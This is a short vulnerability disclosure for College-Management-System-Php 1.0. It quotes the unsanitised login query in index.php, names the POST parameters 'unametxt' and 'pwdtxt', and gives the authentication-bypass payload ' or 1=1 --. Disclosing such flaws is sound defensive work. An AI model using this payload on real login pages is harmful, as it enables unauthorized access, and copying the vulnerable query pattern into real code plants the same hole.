College-Management-System-Php 1.0 SQL Injection

College-Management-System-Php version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | fedd77cb039b3c893f4bfd8b2086e2ca

# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Website:
# Date: 2020-06-16
# Google Dork: N/A
# Vendor:
# Software Link:
# Affected Version: N/A
# Patched Version: unpatched
# Category: Web Application
# Tested on: MAC

The College Management System Php suffers from sql injection vulnerabilities in the index.php page:


$sql=mysqli_query($con,"SELECT * FROM users_tbl
WHERE username='$uname' AND password='$pwd'

SQL injection vulnerability:-
in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability

' or 1=1 --

Thank you

Abu Safian Blay<>

